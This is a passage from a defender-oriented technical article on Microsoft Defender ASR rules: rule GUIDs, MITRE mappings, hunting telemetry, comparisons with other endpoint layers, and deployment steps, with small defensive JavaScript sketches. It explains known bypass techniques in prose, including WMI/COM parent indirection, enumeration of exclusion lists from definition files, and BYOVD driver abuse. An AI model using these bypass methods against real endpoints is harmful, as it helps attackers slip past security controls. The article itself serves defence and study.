Block rebooting machine in Safe Mode	`33ddedf1-c6e0-47cb-833e-de6133960387`	`AsrSafeModeRebootBlocked`	Also emits `AsrSafeModeRebootWarnBypassed` -- proof Warn is supported
Block use of copied or impersonated system tools	`c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb`	`AsrAbusedSystemToolBlocked`	Also emits `AsrAbusedSystemToolWarnBypassed` -- proof Warn is supported

Total: 19 rules. Older blog posts that cite "16 rules" or "17 rules" reflect 2021-2023 snapshots of the catalogue, taken before later additions such as the Safe Mode and copied-tools rules landed.
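Policies and telemetry refer to rules by GUID, so a lookup table helps when reading a policy export. The sketch below transcribes the GUIDs and category groupings from the five tables above into a JavaScript `Map`. The category keys, the shortened rule names, and the `describeRule` helper are this sketch's own labels, not Microsoft identifiers.

```javascript
// GUID -> [category, short name], transcribed from the five tables above.
const ASR_RULES = new Map([
  ["56a863a9-875e-4185-98a7-b882c64b5ce5", ["standard", "Vulnerable signed drivers (BYOVD)"]],
  ["9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2", ["standard", "LSASS credential stealing"]],
  ["e6db77e5-3df2-4cf1-b95a-636979351e5b", ["standard", "WMI event subscription persistence"]],
  ["d4f940ab-401b-4efc-aadc-ad5f3c50688a", ["productivity", "Office child processes"]],
  ["3b576869-a4ec-4529-8536-b80a7769e899", ["productivity", "Office executable content"]],
  ["75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84", ["productivity", "Office code injection"]],
  ["92e97fa1-2edf-4476-bdd6-9dd0b4dddc7b", ["productivity", "Win32 API calls from Office macros"]],
  ["26190899-1602-49e8-8b27-eb1d0a1ce869", ["productivity", "Office communication app child processes"]],
  ["7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c", ["productivity", "Adobe Reader child processes"]],
  ["5beb7efe-fd9a-4556-801d-275e5ffc04cc", ["scripts-email", "Obfuscated scripts"]],
  ["d3e037e1-3eb8-44c8-a917-57927947596d", ["scripts-email", "JS/VBS launching downloaded executables"]],
  ["be9ba2d9-53ea-4cdc-84e5-9b1eeee46550", ["scripts-email", "Executable content from email"]],
  ["d1e49aac-8f56-4280-b9ba-993a6d77406c", ["lateral-prevalence", "PSExec and WMI process creation"]],
  ["01443614-cd74-433a-b99e-2ecdc07bfc25", ["lateral-prevalence", "Prevalence, age, or trusted-list criterion"]],
  ["b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4", ["lateral-prevalence", "Untrusted and unsigned USB processes"]],
  ["c1db55ab-c21a-4637-bb3f-a12568109d35", ["lateral-prevalence", "Advanced ransomware protection"]],
  ["a8f5898e-1dc8-49a9-9878-85004b8a61e6", ["server-system", "Webshell creation for Servers"]],
  ["33ddedf1-c6e0-47cb-833e-de6133960387", ["server-system", "Safe Mode reboot"]],
  ["c0033c00-d16d-4114-a5a0-dc9b3a7d2ceb", ["server-system", "Copied or impersonated system tools"]],
]);

// GUIDs can appear in either case, so normalise before lookup.
function describeRule(guid) {
  const entry = ASR_RULES.get(guid.trim().toLowerCase());
  return entry ? `${entry[0]}: ${entry[1]}` : `unknown rule ${guid}`;
}

// Count rules per category (Map iteration follows insertion order).
const perCategory = {};
for (const [category] of ASR_RULES.values()) perCategory[category] = (perCategory[category] || 0) + 1;

console.log(ASR_RULES.size); // 19
console.log(JSON.stringify(perCategory));
// {"standard":3,"productivity":6,"scripts-email":3,"lateral-prevalence":4,"server-system":3}
console.log(describeRule("D4F940AB-401B-4EFC-AADC-AD5F3C50688A")); // productivity: Office child processes
```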

The per-rule MITRE crosswalk

MITRE ATT&CK's Behavior Prevention on Endpoint mitigation (M1040) nominates ASR rules by name for several technique families. The first eight rows below are verbatim nominations from the M1040 page; the last two (T1505.003 and T1562.009) are this article's own mappings from rule semantics to the most-natural MITRE technique, because M1040 itself does not enumerate the Webshell or Safe Mode Boot techniques [@mitre-m1040]:

MITRE technique	ASR rule that covers it
T1059.005 / T1059.007 (Command and Scripting Interpreter: Visual Basic / JavaScript)	Block JavaScript or VBScript from launching downloaded executable content; Block execution of potentially obfuscated scripts
T1543 / T1543.003 (Create or Modify System Process / Windows Service)	Block abuse of exploited vulnerable signed drivers
T1486 (Data Encrypted for Impact)	Use advanced protection against ransomware
T1546.003 (Event Triggered Execution: WMI Event Subscription)	Block persistence through WMI event subscription
T1559 / T1559.002 (Inter-Process Communication: Dynamic Data Exchange)	Block all Office applications from creating child processes
T1106 (Native API)	Block Win32 API calls from Office macros
T1027 / T1027.009 / T1027.010 (Obfuscated Files or Information)	Block execution of potentially obfuscated scripts
T1003.001 (LSASS Memory)	Block credential stealing from the Windows local security authority subsystem
T1505.003 (Server Software Component: Web Shell) -- author mapping, not M1040-nominated	Block Webshell creation for Servers
T1562.009 (Impair Defenses: Safe Mode Boot) -- author mapping, not M1040-nominated	Block rebooting machine in Safe Mode

The crosswalk gives a defender the per-technique coverage map without leaving the article.

Note: Recall from Section 1: every rule emits a rule-specific Asr<RuleName>Audited and Asr<RuleName>Blocked pair (the Webshell rule excepted), and the canonical universal Advanced Hunting filter is where ActionType startswith "Asr" [@ms-learn-asr-reference].
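The naming convention is regular enough to parse. The following is a minimal sketch. It assumes an ASR ActionType always carries the `Asr` prefix and ends in one of the outcome suffixes named in this section: `Audited`, `Blocked`, or the `WarnBypassed` form the Safe Mode and copied-tools rules emit. Any other `Asr`-prefixed value is reported as unrecognised rather than guessed at. The function name is hypothetical.

```javascript
// Outcome suffixes named in the text; anything else is reported, not guessed.
const OUTCOME_SUFFIXES = ["WarnBypassed", "Audited", "Blocked"];

// Split an ASR ActionType into its rule stem and outcome; null for non-ASR rows.
function parseAsrActionType(actionType) {
  if (!actionType.startsWith("Asr")) return null;
  for (const suffix of OUTCOME_SUFFIXES) {
    if (actionType.endsWith(suffix)) {
      // Drop the 3-character "Asr" prefix and the suffix.
      return { stem: actionType.slice(3, -suffix.length), outcome: suffix };
    }
  }
  return { stem: actionType.slice(3), outcome: "unrecognised" };
}

console.log(parseAsrActionType("AsrLsassCredentialTheftBlocked"));
console.log(parseAsrActionType("AsrSafeModeRebootWarnBypassed"));
console.log(parseAsrActionType("DeviceLogon")); // null
```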

The Webshell rule's missing DeviceEvents ActionType is the most visible gap in the catalogue's telemetry surface. Defenders typically use Sysmon Event ID 11 (FileCreate) in web roots and IIS access logs to corroborate blocked webshell creations on servers; the Microsoft Learn rules reference is explicit that the EDR-alerts column for this rule is "N" [@ms-learn-asr-reference].

The universal Advanced Hunting query, demonstrated below in a runnable JavaScript shape so a reader can verify the aggregation logic without a Defender for Endpoint tenant, is the single most useful starting point for any ASR investigation.

```javascript
// Mocked DeviceEvents rows. Replace with the output of:
//   DeviceEvents
//   | where ActionType startswith "Asr"
//   | summarize count() by ActionType, DeviceName
//   | order by count_ desc
const deviceEvents = [
  { DeviceName: "WS-FIN-042", ActionType: "AsrOfficeChildProcessBlocked" },
  { DeviceName: "WS-FIN-042", ActionType: "AsrOfficeChildProcessBlocked" },
  { DeviceName: "WS-FIN-118", ActionType: "AsrOfficeChildProcessAudited" },
  { DeviceName: "WS-ENG-003", ActionType: "AsrLsassCredentialTheftBlocked" },
  { DeviceName: "WS-FIN-042", ActionType: "AsrPsexecWmiChildProcessAudited" },
  { DeviceName: "WS-FIN-118", ActionType: "AsrVulnerableSignedDriverBlocked" },
  { DeviceName: "OTHER", ActionType: "DeviceLogon" }, // filtered out
];

// where ActionType startswith "Asr"
// (KQL's startswith is case-insensitive; JavaScript's startsWith is not.)
const asrRows = deviceEvents.filter(r => r.ActionType.startsWith("Asr"));

// summarize count() by ActionType, DeviceName
const counts = asrRows.reduce((m, r) => {
  const key = r.ActionType + " | " + r.DeviceName;
  m[key] = (m[key] || 0) + 1;
  return m;
}, {});

// order by count_ desc
Object.entries(counts)
  .sort((a, b) => b[1] - a[1])
  .forEach(([key, n]) => console.log(n + "\t" + key));
```

Nineteen rules. Five categories. One catalogue that has grown by twelve rules in nine years and shows no sign of stopping. But ASR is not the only behaviour-blocking layer on the Windows endpoint. How does the catalogue compare to CrowdStrike's Indicators of Attack, SentinelOne's Storyline, App Control for Business, Sysmon, and the rest?

7. Where ASR Sits Among the Behaviour Layers

ASR is one of seven currently deployed methods for behavioural defence on the Windows endpoint. None of them obsoletes any of the others; they layer. Counting the strengths honestly means counting the weaknesses too.

App Control for Business, AppLocker, WDAC

Identity classification. App Control for Business (formerly Windows Defender Application Control, WDAC) and the older AppLocker are stricter than ASR on the identity axis (default-deny when tuned) but blind to behaviour edges among allowed binaries [@ms-learn-applocker]. The Vulnerable Driver Blocklist that ships default-on with Windows 11 22H2 is the kernel-load-time sibling to ASR's BYOVD rule: it works against the same class of attack from the kernel side rather than the user side [@ms-learn-driver-block-rules]. App Control and ASR are complementary, not competing.

CrowdStrike Falcon Behavioral Indicators of Attack

Cloud-evaluated edge classifier. CrowdStrike's own one-line definition of IOAs is the cleanest a vendor has published [@crowdstrike-ioa-definition]: "telltale signs or activities that signal a potential cybersecurity threat or attack is in progress. ... They aim to identify and mitigate a threat before it can fully materialize." The trade-offs cut both ways. CrowdStrike pushes new IOA rules from the cloud without an OS update -- real adaptivity. The cost: no public reference catalogue (every IOA is vendor-internal), a cloud dependency for some configurations, and a commercial licence. ASR is free; CrowdStrike is not.

SentinelOne Singularity Storyline, ActiveEDR

On-agent behavioural-AI engine with per-host storyline graph correlation and a STAR custom-rule layer. SentinelOne's product-level marketing pages return JavaScript-rendered shells or HTTP 404s to text-only fetchers, so byte-precision verification for specific features is currently unavailable. The model-level description (on-agent graph correlation that works offline) is well-attested in the secondary literature. The trade-offs mirror CrowdStrike's: vendor-internal classifier, no public catalogue, commercial licence. This article keeps the framing at the model level and avoids specific feature or performance claims.

Note: The SentinelOne canonical product URLs are HTTP 404 or JavaScript-rendered shells with no byte-extractable text. The model-level claim (on-agent behavioural-AI graph correlation, STAR custom-rule layer, designed offline) is well-attested in the secondary literature; no specific feature claim has a single byte-verified URL behind it in this iteration.

Microsoft 365 Apps internet-macro default block

The Office-internal parallel layer that ended the macro era for unmanaged tenants [@ms-learn-internet-macros-blocked] [@ms-techcommunity-internet-macros-2022]. It is Office-only and macro-only; it covers none of DDE, OLE, embedded executables, or non-VBA Office attack chains. ASR remains the layer that catches the corresponding edge if the macro layer is bypassed by a managed-tenant override or by a non-macro initial-access vector.

Sysmon and custom SIEM rules

High-fidelity edge visibility; no enforcement. Practitioners run Sysmon alongside ASR for audit-trail coverage of edges ASR does not block and for corroborating telemetry around edges it does. Note that MITRE M1042 ("Disable or Remove Feature or Program") does not mention Sysmon or ASR by name [@mitre-m1042]; the Sysmon-with-ASR pairing is practitioner consensus rather than an M1042 nomination. M1040 (Behavior Prevention on Endpoint) is the mitigation that names ASR rules verbatim [@mitre-m1040].

EDR-in-block-mode

The sibling post-event automated-response layer to ASR, not an umbrella over it. EDR-in-block-mode is designed for passive-AV configurations where Defender Antivirus is not the primary. Microsoft Learn's EDR-in-block-mode page is unambiguous about the dependency: "Features like network protection and attack surface reduction (ASR) rules and indicators ... are only available when Microsoft Defender Antivirus is running in Active mode" [@ms-learn-edr-in-block-mode]. A passive-mode Defender therefore runs no ASR rules at all, which is why EDR-in-block-mode matters there. EDR-in-block-mode acts strictly post-event on EDR detections; ASR acts pre-completion on the operation itself. Different points in the timeline.

A common misframing places EDR-in-block-mode as the umbrella feature that "covers" ASR. The Microsoft Learn page contradicts that reading directly. EDR-in-block-mode is the layer that lets Defender for Endpoint block based on its EDR findings even when a third-party AV is primary; ASR is the layer that intercepts the operation at the minifilter before the operation completes. They are siblings, not parent and child [@ms-learn-edr-in-block-mode].

The comparison matrix

The seven methods on seven axes. Read this as a trade-off space; no row dominates the others on every axis.

Method	Classification axis	Enforcement substrate	Catalogue inspectability	Cost	Cloud-connectivity required	OS coverage	Best suited for
ASR rules	Edge	Kernel-mode minifilter + user-mode service	Fully public per-rule [@ms-learn-asr-reference]	Free with Windows	No (some rules require MAPS)	Windows 10 1709+, Windows 11, Windows Server	Behaviour-edge defence; macro chains; LSASS; BYOVD
M365 Apps internet-macro block	Document-trust	Office process	Public docs [@ms-learn-internet-macros-blocked]	Free with M365	No	Microsoft 365 Apps	Internet-marked Office macros
App Control + Vulnerable Driver Blocklist	Identity + driver hash	Kernel	Public policy XML / Block rules [@ms-learn-driver-block-rules]	Free with Windows	No	Windows 10+, Server	Default-deny; kernel-load-time BYOVD
CrowdStrike Falcon IOAs	Edge	Agent + cloud	Vendor-internal [@crowdstrike-ioa-definition]	Commercial	Yes (some)	Cross-platform	Adaptive cloud-pushed behavioural detection
SentinelOne Storyline	Edge graph	On-agent	Vendor-internal	Commercial	No (designed offline)	Cross-platform	Per-host graph correlation
Sysmon + SIEM	Visibility only	User-mode (Sysmon) + SIEM	Public events; SIEM rules per-tenant	Sysmon free; SIEM commercial	Yes (SIEM)	Windows 7+, Linux	Audit trail; corroboration
EDR-in-block-mode	Post-detection block	MDE service	MDE-managed	Defender for Endpoint licence	Yes	Windows 10+, Server	Passive-AV configurations

AV-Comparatives' Endpoint Prevention and Response Test 2023 evaluated 12 EPR products against 50 multi-stage targeted-attack scenarios across three phases -- Endpoint Compromise and Foothold, Internal Propagation, Asset Breach -- over June through September 2023 [@av-comparatives-epr-2023]. Per-product scoring is paywalled and is not reproduced here; only the methodology is cited as the cross-vendor backdrop against which any "ASR vs the rest" empirical claim has to be measured. The article makes no specific scoring claim against AV-Comparatives data because the scoring is not publicly extractable from the free summary.

Each row in the matrix names a different trade-off. ASR is the only row that is free, kernel-mediated, fully inspectable, and shipped with every Windows edition that includes Defender Antivirus. But the catalogue is finite. And the attacker's degrees of freedom are not. What does the theory say about the gap?

8. What No Behaviour Block List Can Do

Every defence layer has a lower bound. ASR's is Cohen 1984 -- but indirectly, through the structural floor that every edge predicate inherits.

Cohen's 1984 result (introduced in Section 3 as a Definition with its diagonal-construction proof sketch and Rice-1953 corollary) proves that deciding whether an arbitrary program exhibits viral behaviour is at least as hard as the Halting Problem, and is therefore undecidable in general [@cohen-1984-part1]. ASR sidesteps the result by changing the question. Not "is this program malicious?" -- undecidable in general -- but "did this specific edge in the runtime graph just occur?" -- decidable per event at the OS interception layer, because the predicate inspects one finite event record and terminates. The Cohen ceiling forbids general node classification; it does not forbid edge classification, which is decidable per edge.

The cost is two structural floors that any behaviour-block list inherits.

The over-approximation floor. Every edge predicate is itself an over-approximation of "is this edge malicious." Legitimate IT-automation Word macros do legitimately spawn PowerShell. Legitimate backup software does legitimately read LSASS memory (WerFaultSecure.exe appears on extracted LSASS-rule exclusion lists per Adam Svoboda's VDM-extraction technique [@adamsvoboda-asr-exclusions]). Legitimate management software does legitimately write driver files. Every ASR rule therefore has a structural false-positive floor; the per-rule exclusion list is the recovery mechanism. Exclusion lists trade safety for compatibility.
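The over-approximation floor and its recovery mechanism fit in a few lines. In this hypothetical sketch the predicate flags every process that reads LSASS memory, and a per-rule exclusion list carves out known-legitimate callers. `WerFaultSecure.exe` appears because the text cites it. The backup-agent directory, the event shape, and the function names are invented for illustration; none of this is Defender's shipped list or logic.

```javascript
// Hypothetical LSASS-read rule: the predicate over-approximates, exclusions recover.
// Entries are illustrative, not Defender's actual exclusion list.
const LSASS_RULE_EXCLUSIONS = [
  "c:\\windows\\system32\\werfaultsecure.exe", // exact file
  "c:\\program files\\examplebackup\\",        // hypothetical backup-agent directory
];

// Predicate: "is this edge credential theft?", deliberately too broad.
function predicate(edge) {
  return edge.target === "lsass.exe" && edge.access === "read";
}

// Trailing backslash = directory prefix; otherwise an exact path match.
function isExcluded(imagePath) {
  const p = imagePath.toLowerCase();
  return LSASS_RULE_EXCLUSIONS.some(e => (e.endsWith("\\") ? p.startsWith(e) : p === e));
}

function verdict(edge) {
  if (!predicate(edge)) return "no-match";
  return isExcluded(edge.sourceImage) ? "excluded" : "block";
}

const edges = [
  { sourceImage: "C:\\Windows\\System32\\WerFaultSecure.exe", target: "lsass.exe", access: "read" },
  { sourceImage: "C:\\Program Files\\ExampleBackup\\agent.exe", target: "lsass.exe", access: "read" },
  { sourceImage: "C:\\Users\\Public\\dump.exe", target: "lsass.exe", access: "read" },
];
for (const e of edges) console.log(verdict(e), e.sourceImage);
// excluded C:\Windows\System32\WerFaultSecure.exe
// excluded C:\Program Files\ExampleBackup\agent.exe
// block C:\Users\Public\dump.exe
```

The directory-prefix entry shows the trade the paragraph names. Any binary an attacker manages to write under that directory inherits the exclusion.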

The catalogue-finiteness upper bound. The space of possible attack edges is countably infinite. Any composition of CreateProcess, WriteFile, RegSetValue, WMI subscription, scheduled task, COM IDispatch::Invoke, or driver-load can be chained into a new edge sequence. The catalogue is finite -- nineteen rules in May 2026 [@ms-learn-asr-reference]. The bound is sharp: an attacker whose chain crosses any edge e in the catalogue is detected at e; an attacker whose chain avoids every edge in the catalogue is not.
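The sharpness of the bound is easiest to see in a toy model. Here a catalogue is a finite set of literal parent-to-child process edges, and an attack chain is a process lineage. The simplification is loud: real ASR predicates are richer than a single parent-child pair. The two catalogue entries and both chains are hypothetical examples drawn from this article's narrative.

```javascript
// Toy model: the catalogue is a finite set of literal parent->child edges.
const CATALOGUE = new Set([
  "winword.exe->cmd.exe",
  "winword.exe->powershell.exe",
]);

// A chain is detected iff at least one consecutive pair is in the catalogue.
function firstCatalogueHit(chain) {
  for (let i = 0; i + 1 < chain.length; i++) {
    const edge = `${chain[i].toLowerCase()}->${chain[i + 1].toLowerCase()}`;
    if (CATALOGUE.has(edge)) return edge;
  }
  return null;
}

const direct = ["WINWORD.EXE", "cmd.exe", "powershell.exe"];
// WMI grandparent: Word's WMI call is not a process-creation edge, so the
// lineage of cmd.exe starts at WmiPrvSE.exe and never crosses a catalogue edge.
const viaWmi = ["WmiPrvSE.exe", "cmd.exe", "powershell.exe"];

console.log(firstCatalogueHit(direct)); // winword.exe->cmd.exe
console.log(firstCatalogueHit(viaWmi)); // null
```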

Key idea: ASR compresses bypass cost; it does not eliminate it. The catalogue is finite. The attacker's space of edges is countably infinite. Behaviour-block lists are incomplete by construction -- and that is not a defect; it is the design philosophy. The defender's job is not to fix the incompleteness but to make every cheap attack chain expensive enough that the attacker stops using it.

The empirical evidence for the catalogue-finiteness bound is the bypass-research cluster. SANS ISC Diary 27036 (Daniel Wesemann, January 27, 2021) documents the WMI-grandparent bypass to the Office-child-process rule [@sans-isc-27036-emotet-asr]. Sevagas / Emeric Nasi's "Bypass Windows Defender Attack Surface Reduction" PDF (2021) documents COM-object-indirection bypasses [@sevagas-asr-bypass]. Primusinterp's "Cheesing Microsoft Attack Surface Reduction rules" enumerates chained-COM bypasses against the 2017-era catalogue [@primusinterp-cheesing-asr]. Adam Svoboda's VDM-extraction technique enumerates the exclusion lists themselves [@adamsvoboda-asr-exclusions]. None of these is a defect Microsoft has been slow to fix. All are structural consequences of the catalogue-finiteness bound.

The proof in Cohen's open-access archive shows that virus detection is at least as hard as the Halting Problem; the 1984 DoD/NBS conference paper is the original presentation; the 1987 *Computers and Security* reprint is the canonical citable journal form. The open-access archive at all.net is the byte-verifiable text; the verbatim sentence "Protection from denial of services requires the detection of halting programs which is well known to be undecidable" is on the first page of Part 1 [@cohen-1984-part1]. The line is the closest one-sentence statement of the structural ceiling that any node-classifying malware detector inherits.

ASR's design philosophy is not to achieve the theoretical optimum of "complete, sound, real-time, false-positive-free edge catalogue" (unachievable for the reasons above). It is to compress the attacker's bypass cost -- to force the attacker off the cheap, common attack chains (WINWORD -> cmd -> PowerShell) onto more expensive ones (WMI grandparent, COM indirection, scheduled-task fan-out, exclusion-list enumeration, BYOVD). The Section 11 FAQ entry that picks up this thread makes it explicit.

A finite catalogue, an unbounded attacker space, and a structural floor under each rule. The next section names the open problems that follow.

9. What Is Still Moving

The bypass-research corpus around ASR is not a temporary embarrassment. It is the permanent shape of every catalogue-based defence. Six open problems define the layer's research frontier as of May 2026.

Problem 1 -- The WMI and COM grandparent bypass class

The canonical bypass is documented in SANS Internet Storm Center Diary 27036, published January 27, 2021 by handler Daniel Wesemann [@sans-isc-27036-emotet-asr]. Emotet's VBA invoked Win32_Process.Create via WMI, so WmiPrvSE.exe became the literal parent of cmd.exe; the Office-child-process rule's predicate is byte-literal (it checks the immediate parent image against the Office binary list) and therefore never fires.

Figure: the WMI-grandparent bypass as a sequence. The VBA macro in WINWORD.EXE calls GetObject winmgmts, then Win32_Process.Create; WmiPrvSE.exe (launched under svchost) raises the process-create notify with itself as the parent; WdFilter.sys forwards an edge event with parent image WmiPrvSE.exe to MsMpEng.exe; rule D4F940AB's predicate is false because there is no Office parent; WdFilter.sys allows the CreateProcess, and WmiPrvSE.exe spawns cmd.exe.

'cmd' is not a child process of Word, and the ASR block rule to prevent child processes of Word consequently doesn't trigger. -- Daniel Wesemann, SANS ISC Diary 27036, January 27, 2021 [@sans-isc-27036-emotet-asr]

The PSExec/WMI rule (d1e49aac-...) was added in Windows 10 1803 to catch the most common variant, but Microsoft Learn warns that it conflicts with Configuration Manager [@ms-learn-asr-overview]. COM-object indirection (MMC.Application, Outlook.Application, ShellWindows) generalises the bypass beyond WMI [@sevagas-asr-bypass] [@primusinterp-cheesing-asr]. No ASR rule today covers transitive-parent classification across COM or scheduled-task fan-out without breaking Configuration Manager dependencies. The open question is whether a transitive-parent predicate can be added without breaking SCCM, and what false-positive rate that costs.
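A transitive-parent predicate differs from the byte-literal one mainly in how far it looks. The sketch below assumes a hypothetical `causalParent` field that attributes a WMI-created process to the WMI client that requested it. That field is not a documented Windows or Defender property, and producing the attribution reliably is the hard part of the open question. The process table is invented; `CcmExec.exe` (the Configuration Manager client) stands in for a management agent. A hop limit keeps each check bounded.

```javascript
// Hypothetical process table. `parent` is the process-tree parent;
// `causalParent` is an ASSUMED attribution for WMI/COM-mediated creation.
const PROCS = {
  10: { image: "explorer.exe", parent: null },
  20: { image: "svchost.exe", parent: null },
  100: { image: "WINWORD.EXE", parent: 10 },
  200: { image: "WmiPrvSE.exe", parent: 20 },
  300: { image: "cmd.exe", parent: 200, causalParent: 100 }, // macro-initiated
  400: { image: "cmd.exe", parent: 200, causalParent: 500 }, // agent-initiated
  500: { image: "CcmExec.exe", parent: 20 },
};
const OFFICE = new Set(["winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"]);

// Byte-literal predicate: only the immediate process-tree parent counts.
function immediateParentIsOffice(pid) {
  const parent = PROCS[PROCS[pid].parent];
  return Boolean(parent) && OFFICE.has(parent.image.toLowerCase());
}

// Transitive predicate: follow causalParent (else parent) for at most maxHops.
function causalAncestorIsOffice(pid, maxHops = 4) {
  let cur = PROCS[pid];
  for (let hop = 0; hop < maxHops && cur; hop++) {
    const nextPid = cur.causalParent ?? cur.parent;
    cur = nextPid == null ? undefined : PROCS[nextPid];
    if (cur && OFFICE.has(cur.image.toLowerCase())) return true;
  }
  return false;
}

console.log(immediateParentIsOffice(300)); // false: parent is WmiPrvSE.exe
console.log(causalAncestorIsOffice(300));  // true: causal chain reaches WINWORD.EXE
console.log(causalAncestorIsOffice(400));  // false: agent-initiated WMI
```

The toy table cannot answer the false-positive half of the question. It only shows the shape of the check once trustworthy causal attribution exists.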

Problem 2 -- Event 5007 and exclusion-list enumeration

Adam Svoboda's technique demonstrates that ASR exclusion lists live in Defender VDM containers (mpasbase.vdm, mpasdlta.vdm) and are extractable with wdextract64.exe [@adamsvoboda-asr-exclusions]. A low-privilege user with read access to C:\ProgramData\Microsoft\Windows Defender\Definition Updates\ can enumerate the whitelisted paths the LSASS rule, the BYOVD rule, and other rules carry by default. Tamper Protection prevents runtime modification of the exclusion list but does not prevent read access [@ms-learn-tamper-protection]. Once the exclusion list is enumerated, the per-rule defence becomes "did the attacker drop the payload in a writable whitelisted path?" -- a deployment-quality question, not a structural one. The open problem is whether the exclusion lists should be encrypted at rest with a key not derivable by an unprivileged process.

Problem 3 -- Catalogue completeness against modern initial-access vectors

Emotet's post-2022 pivot to OneNote embedded scripts, HTML smuggling, ISO and IMG containers (which strip MOTW on extraction), LNK files, and 7z archives is not covered by ASR's existing rules [@welivesecurity-emotet-pivot-2022]. SmartScreen, Network Protection, and the Microsoft 365 Apps internet-macro default block cover some of this surface, but not via ASR's edge-predicate model. The open question is whether the ASR catalogue should grow to cover OneNote-spawns-child, or whether the right answer is to rely on the parallel layers and accept that ASR's coverage of OneNote-era initial-access is partial.

Problem 4 -- The Webshell rule's missing telemetry surface

Per the Microsoft Learn rules reference, "Block Webshell creation for Servers" (a8f5898e-...) is the only rule without a DeviceEvents ActionType pair [@ms-learn-asr-reference]. Defenders cannot KQL-hunt for blocked Webshell creations the way they can for every other rule; visibility lives in MpCmdRun.log and IIS access logs. The open question is when Microsoft will add the missing ActionType so that the Webshell rule's audit-and-block events become uniformly queryable in Advanced Hunting.

Problem 5 -- Tamper Protection versus kernel-level attackers

ASR is enforced by WdFilter.sys in kernel mode together with MsMpEng.exe at integrity level System, but a kernel-mode attacker (for example, one who has gained kernel execution through a BYOVD-loaded vulnerable driver) is a peer of the driver. BlackByte's 2022 BYOVD campaigns demonstrated the pattern: load a vulnerable signed driver, disable Defender's notify routines, proceed [@sophos-blackbyte-returns-2022]. The ASR BYOVD rule (56a863a9-...), the WDAC Vulnerable Driver Blocklist default-on in Windows 11 22H2 [@ms-learn-driver-block-rules], and Hypervisor-protected Code Integrity each close a sub-class. None closes the full class, because the driver blocklist is bounded by its update cadence. The open question is whether WdFilter.sys can be moved into a Virtualization-Based Security isolated enclave such that even a kernel-compromise primitive cannot tamper with ASR enforcement.

Problem 6 -- The inspectability dual

ASR's structural floor is catalogue finiteness. The structural floor of its SOTA competitors (CrowdStrike AI-powered IOAs, SentinelOne Storyline) is vendor-internal inspectability. When an AI-powered IOA fires, the defender has no rule GUID to look up, no published predicate to reason about, no per-edge auditability for purple-team coverage assessment. The two bounds are complementary: ASR optimises for inspectability at the cost of catalogue-growth lag; the AI-powered competitors optimise for adaptive classifier coverage at the cost of inspectability. A complete edge-classification SOTA layer would combine both. No single product currently does.

Note: The Outflank ASR-bypass blog corpus is a well-known research-cluster member; live URLs returned HTTP 403 (Cloudflare) and Wayback Machine fallbacks were unreachable from the verification environment. Named honestly here without inventing a URL. The bypass cluster's claims are independently supported by SANS ISC [@sans-isc-27036-emotet-asr], Sevagas [@sevagas-asr-bypass], Primusinterp [@primusinterp-cheesing-asr], and Adam Svoboda [@adamsvoboda-asr-exclusions].

The catalogue is incomplete by construction. The defender's job is not to fix the incompleteness; it is to make every cheap attack chain too expensive to use. Section 10 codifies that into a Monday-morning playbook.

10. How to Actually Use This on Monday

Five steps. Source-control everything. Treat ASR not as a replacement for AppLocker, App Control for Business, or your EDR -- treat it as a kernel-mediated, free, behaviour-edge layer that costs almost nothing once tuned.

Step 1 -- Enable the three Standard protection rules in Block mode first

Microsoft itself classifies these three as low-false-positive-floor [@ms-learn-asr-overview]:

Block abuse of exploited vulnerable signed drivers (Device) -- 56a863a9-875e-4185-98a7-b882c64b5ce5.
Block credential stealing from the Windows local security authority subsystem -- 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2. Note: if LSA Protection is enabled on the device (recommended together with Credential Guard), Microsoft Learn states verbatim that "this rule is redundant" and Defender will show the rule as "not applicable" [@ms-learn-asr-overview].
Block persistence through WMI event subscription -- e6db77e5-3df2-4cf1-b95a-636979351e5b. Even though this rule is in the Standard set, Microsoft Learn recommends extensive Audit-mode testing if Configuration Manager manages the device, "because the Configuration Manager client relies heavily on WMI" [@ms-learn-asr-overview].
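Step 1, combined with the "start every rule in Audit" rule of Step 2, amounts to a starting policy: the three Standard protection GUIDs in Block, everything else in Audit. The following is a minimal sketch. It assumes the policy is held as a plain GUID-to-mode object that you would later translate into whatever your management tool expects. The mode strings are labels, not any tool's encoded values, and `initialPolicy` and its `auditFirst` option are hypothetical.

```javascript
// The three Standard protection rules from Step 1.
const STANDARD_BLOCK = new Set([
  "56a863a9-875e-4185-98a7-b882c64b5ce5", // vulnerable signed drivers
  "9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2", // LSASS credential stealing
  "e6db77e5-3df2-4cf1-b95a-636979351e5b", // WMI event subscription persistence
]);

// Standard rules start in Block, every other rule in Audit. `auditFirst` holds a
// Standard rule back in Audit, e.g. the WMI rule on Configuration Manager devices.
function initialPolicy(allRuleGuids, { auditFirst = [] } = {}) {
  const holdBack = new Set(auditFirst.map(g => g.toLowerCase()));
  const policy = {};
  for (const raw of allRuleGuids) {
    const guid = raw.toLowerCase();
    policy[guid] = STANDARD_BLOCK.has(guid) && !holdBack.has(guid) ? "Block" : "Audit";
  }
  return policy;
}

const sample = [
  "56a863a9-875e-4185-98a7-b882c64b5ce5",
  "E6DB77E5-3DF2-4CF1-B95A-636979351E5B",
  "d4f940ab-401b-4efc-aadc-ad5f3c50688a",
];
console.log(initialPolicy(sample, { auditFirst: ["e6db77e5-3df2-4cf1-b95a-636979351e5b"] }));
```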

Step 2 -- Move the other sixteen rules through Audit, Warn, Block

The canonical deployment ladder is enumerated in the implementation guide on Microsoft Learn. Start every rule in Audit and watch DeviceEvents for false positives. Then transition to Warn (or Block where Warn is unsupported), and finally to Block once the false-positive rate is acceptable in your first deployment ring [@ms-learn-asr-deployment-implement]. Two rules skip Warn entirely and go from Audit straight to Block: Block credential stealing from LSASS and Block Office applications from injecting code into other processes [@ms-learn-asr-overview]. The LSASS rule is already in Block from Step 1, so among the sixteen only the Office-injection rule skips Warn; the remaining fifteen support the full three-step ladder.
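The ladder is a small state machine. The following sketch assumes the two no-Warn rules named above are the only exceptions. It also assumes promotion is gated on a false-positive count observed in the current ring; the threshold parameter and function name are hypothetical, not a Microsoft recommendation.

```javascript
// Rules that skip Warn and go straight from Audit to Block (Step 2).
const NO_WARN = new Set([
  "9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2", // LSASS credential stealing
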